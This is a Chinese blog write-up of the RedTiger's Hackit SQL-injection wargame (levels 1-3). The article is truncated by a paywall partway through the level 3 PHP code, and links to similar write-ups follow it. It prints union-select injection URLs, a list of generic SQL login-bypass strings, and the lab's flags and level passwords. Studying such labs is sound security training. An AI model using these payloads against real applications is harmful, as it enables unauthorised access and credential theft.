RedTiger‘s Hackit

最新推荐文章于 2022-07-27 21:20:55 发布
VIP文章 最新推荐文章于 2022-07-27 21:20:55 发布
阅读量1.3k 收藏 9
点赞数 1
分类专栏: CTF sql注入 文章标签: sql
Alita_lxz
本文链接:https://blog.csdn.net/qq_45774670/article/details/109391391
版权

RedTiger’s Hackit

http://redtiger.labs.overthewire.org/

Level 1 Simple SQL-Injection

打开对应连接,是一个登录页面,先是告诉我们登录的用户名是什么,然后给了一个提示,把表名level1_users给出来了,现在就是要找注入点在哪里了,看到Category:后的1可以点击
在这里插入图片描述
点击之后出来cat=1,这就很明显了
在这里插入图片描述
试了一大顿,发现这个1后竟然不需要闭合引号,根据order by 得出表有4列
在这里插入图片描述在这里插入图片描述
本来想爆一下列名,可能是有参数被禁用了吧
在这里插入图片描述
http://redtiger.labs.overthewire.org/level1.php?cat=1 union select 1,2,3,4 from level1_users
在这里插入图片描述
3和4应该是username和password了吧,构造payload:http://redtiger.labs.overthewire.org/level1.php?cat=1 union select 1,2,username,password from level1_users
在这里插入图片描述
得到用户名密码,登录得到flag

You can raise your wechall.net score with this flag: 27cbddc803ecde822d87a7e8639f9315
The password for the next level is: passwords_will_change_over_time_let_us_do_a_shitty_rhyme

在这里插入图片描述

Level 2 Simple login-bypass

在这里插入图片描述
一个简单的登录绕过,给了一个提示Hint: Condition 既然是登陆,试一下sql万能密码吧,试了一大顿,终于试出来了,用户名随意密码**‘or’a’='a**
常见的php后台sql验证语句一般如下:

SELECT username,password FROM usertext WHERE username = '$username' AND password = '$password'

常见的sql万能密码:

"or "a"="a
 ')or('a'='a
or 1=1--
'or 1=1--
a'or' 1=1--
"or 1=1--
'or'a'='a
"or"="a'='a
'or''='
1'or'='or'
1 or '1'='1'=1
1 or '1'='1' or 1=1
 'OR 1=1%00

在这里插入图片描述

You can raise your wechall.net score with this flag:1222e2d4ad5da677efb188550528bfaa
The password for the next level is: feed_the_cat_who_eats_your_bread

Level 3 Get an error

在这里插入图片描述
获取一个错误,需要得到Admin的密码,表明为 level3_users
点击TheCow和Admin,分别显示如下图
在这里插入图片描述
在这里插入图片描述
出现了一个参数usr和类似base64编码的值,

MDQyMjExMDE0MTgyMTQw 042211014182140
MDYzMjIzMDA2MTU2MTQxMjU0 063223006156141254

类似于uid的一串数字,在登陆框,和url参数试了好久,也没有错误提示,万能密码也试遍了,硬生生是没有错误,看了看别人的wp,才恍然大悟,把usr传入的参数转变为一个数组不就出现错误了
在这里插入图片描述
然鹅,出现错误了,我也没有思路,只能继续看wp,发现这个.inc文件藏有玄机

.inc 文件,顾名思义就是include file,实际上文件的后缀对于文件包含是无所谓,你可以包含一个asp文件,也可以包含txt文。一般我们使用inc作为后缀,是因为这样能体现该文件的作用。
使用inc文件可以使我们的程序,增加可读性,更易于开发和维护。

直接访问,查看网页源代码,发下php代码
在这里插入图片描述

<?php

	// warning! ugly code ahead :)
	// requires php5.x, sorry for that
  		
	function encrypt($str)
	{
   
		$cryptedstr = "";
		srand(3284724);
		for ($i =0; $i < strlen($str); $i++)
		{
   
			$temp = ord(substr($str,$i,1)) ^ rand(0, 255);
			
			while(strlen($temp)<3)
			{
   
				$temp = "0".$temp;
			}
			$cryptedstr .= $temp. "";
		}
		return base64_encode($cryptedstr);
	}
  
	function decrypt ($str
最低0.47元/天 解锁文章
QWxpdGE
关注
  • 1
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
RedTiger's Hackit Level 1
GTMer的专栏
10-27 1138
测试发现cat = 1有返回,其他均报错 http://redtiger.labs.overthewire.org/level1.php?cat=1 其后接and 1 =1 和 and 1= 2 有不同反馈,存在注入 union select 1,2,3,4  发现存在4列,显示第3、4列 尝试从information_sechema读取数据,提示disabled。
writeup--RedTiger's Hackit
charlie_heng的专栏
12-19 4118
RedTiger’s Hackit第一关首先点进Category 1 网址后面跟了?cat=1,很明显是一个sql注入 看了下还给了表名。。Tablename: level1_users 构造了下 https://redtiger.labs.overthewire.org/level1.php?cat=1 union select 1,2,username,password from le
RedTiger‘s Hackit练习sql漏洞
weixin_43939527的博客
10-18 530
level1 level1打开界面如下图 通过http://redtiger.labs.overthewire.org/level1.php?cat=1 ’ http://redtiger.labs.overthewire.org/level1.php?cat=1 and 1=1 http://redtiger.labs.overthewire.org/level1.php?cat=1 and 1=2 测试,发现这是一个数字型sql注入漏洞 知道存在漏洞后,我们通过order by判断数据表的列数 这个
php 0815 wechall,渗透测试演练平台RedTigers Hackit通关writeup以及wechall平台介绍
weixin_32394375的博客
03-18 440
本文转载自Redtiger Hackit WriteupRedTigers Hackit是一个训练SQL注入漏洞和PHP方面的网站,地址为https://redtiger.labs.overthewire.org/。相比hackinglab上面考察的常规SQL注入,redtiger上面的题目更多考察的是对于程序逻辑的思考,需要思考后台php代码是如何编写的。如果有一定的网站编写经验或者是网站的渗透...
渗透测试:SQL注入理论加实战讲解
WEL测试
11-17 655
什么是SQL注入 SQL注入是一种WEB应用代码中的漏洞。黑客可以构造特殊请求,使Web应用执行带有附加条件的SQL语句。导致SQL注入常见的两种原因如下: 用户请求中带有参数的值,没有进行任何过滤。 用户请求中带有参数的值,没有进行任何转码。 通过特殊的请求,Web应用向数据库访问时会附带其他命令: 任意查询命令 创建数据库/表 更新数据库/表内容 更改用户权限 删除数据/表/数据库 执行系统命令 SQL注入漏洞对于数据安全的影响 可读取/修改数据库中的库和表: 获取用户的账号、密码(可能被加
xsslabs通关
qq_61774705的博客
07-15 612
两个地方都用了htmlspecialchars($str),它的作用是将特殊符号转换成HTML实体,就是HTML为了防止特殊符号,如"
RedTiger's Hackit(level2)
xz913400155的博客
12-11 466
第二关 简单的sql绕过 https://redtiger.labs.overthewire.org/ 进入第二关 给的目标是登入 提示是条件 然后就给了用户名及密码两个输入框 很容易就联想到输入内容就是查询语句中where的判断条件 账号密码一般都是用字符串格式 所以猜测where语句差不多是如下格式 where username=‘我们的输入’ and password=‘我们的输入’ 然...
RedTiger‘s Hackit -- level 10
最新发布
qq_42303523的博客
07-27 1068
RegTiger's hackit level 10的解法和原理
Redtiger Hackit Writeup
weixin_30326515的博客
08-09 769
RedTiger's Hackit Level 1 Welcome to level 1 Lets start with a simple injection. Target: Get the login for the user Hornoxe Hint: You really need one? omg -_- Tablename: level1_users ...
#五#RedTiger's Hackit的wp
vircorns的博客
08-10 509
做题链接:http://redtiger.labs.overthewire.org/ 关于知识点整理 https://blog.csdn.net/weixin_43476037/article/details/87464475 wp level 1 表名已知:level1_users,点开Category发现注入点cat 构造?cat=1 union select 1,2,username,p...
RedTiger's Hackit Level 2
GTMer的专栏
10-27 724
username处注入 a' or 'a' = 'a' -- d    不行,应该是把后面frome table给注释掉的原因。 由于and的优先级高于or,因此在username后注入的or语句和password判断and在一起,不管用。 在password后注入or语句,get !
RedTiger's Hackit Level 3
GTMer的专栏
10-29 708
usr采用了某种编码,usr[0]=? 使php报错,得到加密代码路径。 php加密代码中使用了srand定义了种子,因此其后每次rand()值都是固定的。 可能是由于php版本不同,我加解密得到的结果和网站不一样,由于rand()算法不同?
RedTiger's Hackit wirteup
a370793934的专栏
11-28 640
sql注入挑战 level1 简单注入,payload: http://redtiger.labs.overthewire.org/level1.php?cat=0 union select 1,2,username,password from level1_users 返回 Hornoxe thatwaseasy 登录后显示 You made it! You can raise...
RedTiger‘s Hackit Level 1总结
滚滚是只小狐狸
02-14 1137
RedTiger’s Hackit Level 1总结 Level 1 题目: Welcome to level 1 Lets start with a simple injection. Target: Get the login for the user Hornoxe Hint: You really need one? omg -_- Tablename: level1_users Cat...
Hacking Diablo II之D2HACKIT技术详解
热门推荐
Sting的专栏 - Under the hood
12-29 1万+
趁着圣诞又歇了几天,没博,倒是主动被动的看了不少片子。我发现我的观影口味挺杂,什么都看,还什么都能看的津津有味。这些片中,有肥皂剧型的“Ally McBeal”(甜心俏佳人),柯恩兄弟的黑帮型的"Millers Crossing",闷骚型的“Country Life”,一直想看的“北京乐与路”,还有成龙大叔的“神话”。前几天有博友留言希望我多谈点儿d2hackit,那我就随便说说。D2中的外挂,
Sql_injection
qq_49422880的博客
07-23 238
Bugku学生成绩查询 题目: 查询框也给出了提示,1,2,3,开始查询试试看,查询到4的时候就已没有信息显示,进行联合查询,使用union关键字。   1.查看有几个字段 ,到五的时候就在没有显示,说明只有五个字段。 1' order by 5 #   2.查看库名,有四个数据库,那我们要查的库肯定是skctf。 id=1' union select 1,1,1,group_concat(distinct table_schema) from information_schema.tables #
Jarvis-OJ-- Simple Injection解法
qq_42812036的博客
11-05 497
PORT51(curl) LOCALHOST(伪造ip) Login(SQL注入) 神盾局的秘密(base64编码+反序列化) IN A Mess(代码审计+过滤空格SQL注入) admin(robots.txt+cookie欺骗) [61dctf]babyphp(Git泄露+代码注入) Easy Gallery(文件上传、%00截断) Simple Injection(过滤空格SQL注入) RE...
Jarvisoj_Simple Injection
一只迂腐子
03-04 1469
Simple Injection - 167 SOLVERS - 350 WEB 很简单的注入,大家试试? 题目入口:http://web.jarvisoj.com:32787/ 题目来源:ISCC2016 访问页面之后,得到就是一个登陆页面。通过burp进行抓包,发现在响应头或者是页面中含有提示信息,那么就说明这的确是一个普通的登陆型的SQL注入漏洞了。 常见的登陆漏洞类型 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值